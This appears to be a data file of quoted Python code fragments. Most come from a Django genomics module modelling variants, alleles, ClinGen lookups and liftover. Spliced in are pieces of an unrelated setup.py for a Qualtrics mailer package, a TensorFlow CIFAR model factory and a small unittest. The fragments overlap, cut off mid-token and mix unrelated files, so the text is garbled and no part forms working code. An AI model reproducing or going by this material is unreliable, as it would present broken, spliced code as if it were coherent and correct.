"shares existing contig genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele in",
"models, IntegrityError from django.db.models import Value as V, QuerySet, F from django.db.models.deletion import",
"variant in allele {self.id} for build {genome_build}') if not va: va = vas.first()",
"== '.' @property def is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT @property def",
"{name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod",
"= va.error return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']:",
"= Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status != ProcessingStatus.SUCCESS: raise",
"self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection",
"kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error =",
"pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self):",
"created - allele_source used to retrieve them The VCF (in genome_build build) is",
"down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def __str__(self): return f\"{self.allele}",
"= models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom",
"if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False})",
"set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs:",
"as V, QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import TextField",
"to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self) -> Optional[Allele]: va",
"bool: return self.is_standard_variant or self.is_reference @property def can_have_annotation(self) -> bool: return self.is_standard_variant def",
"va = None if genome_build: va = vas.filter(genome_build=genome_build).first() if not va and not",
"cta.hgvs_c return c_hgvs @property def start(self): return self.locus.position @property def end(self): return self.locus.position",
"def clean_variant_fields(chrom, position, ref, alt, want_chr): ref = ref.strip().upper() alt = alt.strip().upper() if",
"= qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\" return",
"only 1 Variant for a given locus/alt per database (handled via insertion queues)",
"to resolve to the same allele (due to our normalization not being the",
"clingen_error(self): error = None if va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error",
"the desired genome build For others (NCBI Remap) we need to write the",
"va.error return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']: try:",
"Restrict to contigs in a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q():",
"but it's not likely. It's a bug to have the same 3 variant/build/allele",
"and self.locus.ref.length != self.alt.length @property def is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT",
"at all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build,",
"ref == alt or alt == '.' @property def is_reference(self) -> bool: return",
"def genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc in",
"return conversion_tool, variant_tuple conversion_tool = None g_hgvs = None if self.clingen_allele: try: g_hgvs",
"- usually used as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL =",
"from django.db.models.fields import TextField from django.db.models.functions import Greatest from django.db.models.functions.text import Concat from",
"Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav",
"self.is_standard_variant or self.is_reference @property def can_have_annotation(self) -> bool: return self.is_standard_variant def as_tuple(self) ->",
"self.locus.ref.length < self.alt.length @property def is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and",
"models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele,",
"a given locus/alt per database (handled via insertion queues) \"\"\" REFERENCE_ALT = \"=\"",
"return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs",
"insertion queues) \"\"\" REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence,",
"= f\"{other_allele} merge into {self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge",
"return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants represent the",
"is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self) -> bool: \"\"\"",
"partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a source of alleles",
"def is_ref_alt_reference(ref, alt): return ref == alt or alt == '.' @property def",
"library.genomics import format_chrom from library.utils import md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types",
"= cta.hgvs_c return c_hgvs @property def start(self): return self.locus.position @property def end(self): return",
"genome_build build) is set in UploadedFile for the UploadPipeline \"\"\" user = models.ForeignKey(User,",
"\"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())}",
"chrom, position, ref, alt = m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position,",
"(so Locus/Variant can have unique constraints) Postgres by default uses indexes for constraints,",
"status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition",
"contigs in a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT)",
"= models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build",
"if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various",
"VCF coordinates during liftover. Can be slow (API call) If you know a",
"there, and can't have another, so it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele",
"self.is_reference @property def can_have_annotation(self) -> bool: return self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return",
"FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for",
"ClinGen Allele (may not have been possible to retrieve in all builds, but",
"return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy def grch38(self) -> Optional['Variant']: try:",
"self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property def is_insertion(self) -> bool: return",
"def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling indels.",
"build being represented by 1 loci in the build being used by ClinGen)",
"sequence is standard [GATCN] (ie not special or reference) \"\"\" # locus.ref should",
"def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection =",
"= models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together",
"on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)",
"flat=True))) def __str__(self): name = f\"Allele {self.pk}\" if self.clingen_allele: name += f\" ({self.clingen_allele})\"",
"if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is None: raise ValueError(\"Allele contains no",
"to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE)",
"def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\"))",
"def is_indel(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property",
"class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple",
"def get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self)",
"VCF file (ref + >= 1 alts pointing to the same locus for",
"-> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self) != self.full_string",
"def merge(self, conversion_tool, other_allele: \"Allele\") -> bool: \"\"\" Merge other_allele into this allele",
"ie GRCh37 and GRCh38 variants for same change point to same allele This",
"1 loci in the build being used by ClinGen) - but it's not",
"Only works if liftover was done via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return",
"allele if there is one, otherwise go to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\":",
"= None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection)",
"get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling indels. Contigs must match and variant.start <=",
"V, QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import TextField from",
"= VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild,",
"= models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild,",
"genome_build): c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs",
"= models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set",
"by 1 loci in the build being used by ClinGen) - but it's",
"= other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge = False merge_log_message = f\"Error performing",
"Remap) we need to write the source genome build VCF first Alleles must",
"models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return",
"!= SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model):",
"= models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self)",
"that. Another possible solution is to use Gist indexes but that requires installing",
"genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig,",
"-> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']:",
"c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs @property",
"if can_merge: if other_clingen_allele: # Move across ClinGen Allele (may not have been",
"alt) return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple",
"This is called at the end of a liftover pipeline (once per build)",
"The easiest solution is to md5sum seq and make the constraint on that.",
"unique_together constraint We only expect to store Alleles for a small fraction of",
"if self.error: # Retry if server was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return",
"another, so it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if",
"name += f\" ({self.clingen_allele})\" return name def __format__(self, format_spec: str): if format_spec ==",
"if m := regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups() chrom, position, ref,",
"\"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs =",
"kwargs={\"variant_id\": self.pk}) @lazy def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va: return",
"-> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc in gbc_qs} @lazy",
"QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\" if self.source_genome_build:",
"= Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str]",
"seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField() def save(self, force_insert=False,",
"va = self.variantallele_set.all().first() if va is None: raise ValueError(\"Allele contains no VariantAlleles at",
"m := regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups() chrom, position, ref, alt",
"to variant page return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\")",
"for missing representations \"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if",
"{source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele,",
"if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos,",
"on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True)",
"AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN",
"has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via migration \"\"\" seq =",
"@property def chrom(self): return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\"",
"being used by ClinGen) - but it's not likely. It's a bug to",
"liftover_complete: If False does not check for missing representations \"\"\" if liftover_complete: v37",
"destination def get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def",
"locus/alt per database (handled via insertion queues) \"\"\" REFERENCE_ALT = \"=\" locus =",
"= None g_hgvs = None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool =",
"abbreviate: ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string:",
"try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant',",
"if other_clingen_allele and self.clingen_allele: can_merge = False merge_log_message = f\"Error performing {merge_log_message}: both",
"fraction of Variants So don't want them on the Variant object - instead",
"return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants - usually",
"return ref == alt or alt == '.' @property def is_reference(self) -> bool:",
"== 'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele) else: return f\"Allele {self.pk}\" def",
"Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' },",
"and variant.start <= end AND variant.end_position >= start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\",",
"\"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end):",
"return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1 per line in a VCF"
] |
[
"pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language",
"classifiers=[ 'Programming Language :: Python :: 3.6' ], packages=[ 'qualtrics_mailer' ], install_requires=[ 'pandas',",
"Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python ::",
"<filename>setup.py from setuptools import setup setup( name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built",
"author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python :: 3.6' ], packages=[ 'qualtrics_mailer'",
"from setuptools import setup setup( name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built surveys",
"Python :: 3.6' ], packages=[ 'qualtrics_mailer' ], install_requires=[ 'pandas', 'requests' ], zip_safe=False )",
"package for distributing pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT',",
"'Programming Language :: Python :: 3.6' ], packages=[ 'qualtrics_mailer' ], install_requires=[ 'pandas', 'requests'",
"description='A package for distributing pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>',",
"surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language ::",
":: Python :: 3.6' ], packages=[ 'qualtrics_mailer' ], install_requires=[ 'pandas', 'requests' ], zip_safe=False",
"setup( name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built surveys in Qualtrics', keywords='qualtrics survey',",
"distributing pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming",
"in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python",
"url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python :: 3.6' ], packages=[",
"setup setup( name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built surveys in Qualtrics', keywords='qualtrics",
"setuptools import setup setup( name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built surveys in",
"Language :: Python :: 3.6' ], packages=[ 'qualtrics_mailer' ], install_requires=[ 'pandas', 'requests' ],",
"for distributing pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[",
"license='MIT', classifiers=[ 'Programming Language :: Python :: 3.6' ], packages=[ 'qualtrics_mailer' ], install_requires=[",
"author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python :: 3.6' ], packages=[ 'qualtrics_mailer' ],",
"survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python :: 3.6' ],",
"import setup setup( name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built surveys in Qualtrics',",
"name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer',",
"version='0.1', description='A package for distributing pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>',",
"keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python :: 3.6'"
] |
[
".preact_resnet import * from .densenet import * from .dpn import * from .dla",
"= { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn':",
"import * from .dpn import * from .dla import * from .senet import",
"from .senet import * def create_model(model_name, initializer, weight_decay): model_dict = { 'vgg': VGG11,",
"create_model(model_name, initializer, weight_decay): model_dict = { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext':",
"tensorflow as tf from .vgg import * from .resnet import * from .resnext",
"<reponame>respect5716/Tensorflow_Cifar10<gh_stars>0 import tensorflow as tf from .vgg import * from .resnet import *",
"'senet': SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer,",
"import * from .senet import * def create_model(model_name, initializer, weight_decay): model_dict = {",
"'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer,",
"'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs",
"import * from .preact_resnet import * from .densenet import * from .dpn import",
"* from .dla import * from .senet import * def create_model(model_name, initializer, weight_decay):",
".dpn import * from .dla import * from .senet import * def create_model(model_name,",
"from .dla import * from .senet import * def create_model(model_name, initializer, weight_decay): model_dict",
"* from .dpn import * from .dla import * from .senet import *",
"* from .densenet import * from .dpn import * from .dla import *",
"initializer, weight_decay): model_dict = { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d,",
"import tensorflow as tf from .vgg import * from .resnet import * from",
"PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA, } regularizer",
"import * from .densenet import * from .dpn import * from .dla import",
"DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs =",
"SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer':",
"} regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, } model",
"weight_decay): model_dict = { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet':",
"import * from .dla import * from .senet import * def create_model(model_name, initializer,",
"'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA, } regularizer =",
"* from .senet import * def create_model(model_name, initializer, weight_decay): model_dict = { 'vgg':",
"= { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, } model = model_dict[model_name](**kwargs) print(model.summary()) return model",
"{ 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32,",
"'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet':",
"* from .preact_resnet import * from .densenet import * from .dpn import *",
"= tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, } model = model_dict[model_name](**kwargs)",
"from .preact_resnet import * from .densenet import * from .dpn import * from",
"tf from .vgg import * from .resnet import * from .resnext import *",
"import * from .resnet import * from .resnext import * from .preact_resnet import",
"import * from .resnext import * from .preact_resnet import * from .densenet import",
"* from .resnext import * from .preact_resnet import * from .densenet import *",
".senet import * def create_model(model_name, initializer, weight_decay): model_dict = { 'vgg': VGG11, 'resnet':",
"as tf from .vgg import * from .resnet import * from .resnext import",
"VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26,",
"'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla':",
"'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA, }",
"import * def create_model(model_name, initializer, weight_decay): model_dict = { 'vgg': VGG11, 'resnet': ResNet56,",
"'dpn': DPN32, 'senet': SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = {",
"DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, }",
"from .vgg import * from .resnet import * from .resnext import * from",
"* def create_model(model_name, initializer, weight_decay): model_dict = { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet':",
".resnext import * from .preact_resnet import * from .densenet import * from .dpn",
"regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, } model =",
"DPN32, 'senet': SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer':",
"kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, } model = model_dict[model_name](**kwargs) print(model.summary()) return",
".resnet import * from .resnext import * from .preact_resnet import * from .densenet",
"ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA,",
"tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, } model = model_dict[model_name](**kwargs) print(model.summary())",
"from .densenet import * from .dpn import * from .dla import * from",
"from .resnext import * from .preact_resnet import * from .densenet import * from",
".dla import * from .senet import * def create_model(model_name, initializer, weight_decay): model_dict =",
".vgg import * from .resnet import * from .resnext import * from .preact_resnet",
"def create_model(model_name, initializer, weight_decay): model_dict = { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56,",
"from .resnet import * from .resnext import * from .preact_resnet import * from",
"* from .resnet import * from .resnext import * from .preact_resnet import *",
"model_dict = { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57,",
"ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay)",
".densenet import * from .dpn import * from .dla import * from .senet",
"from .dpn import * from .dla import * from .senet import * def"
] |
[
"True import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self):",
"sys sys.dont_write_bytecode = True import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3),",
